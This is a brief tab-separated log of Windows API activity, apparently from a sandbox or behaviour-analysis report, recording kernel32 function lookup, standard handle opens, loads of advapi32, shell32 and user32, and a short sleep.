Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Module	Get Filename		1	Fn
Module	Load	module_name = advapi32.dll, base_address = 2000355328	1	Fn
Module	Load	module_name = shell32.dll, base_address = 1983250432	1	Fn
Module	Load	module_name = user32.dll, base_address = 1975910400	1	Fn
System	Sleep	duration = 200 milliseconds (0.200 seconds)	2	Fn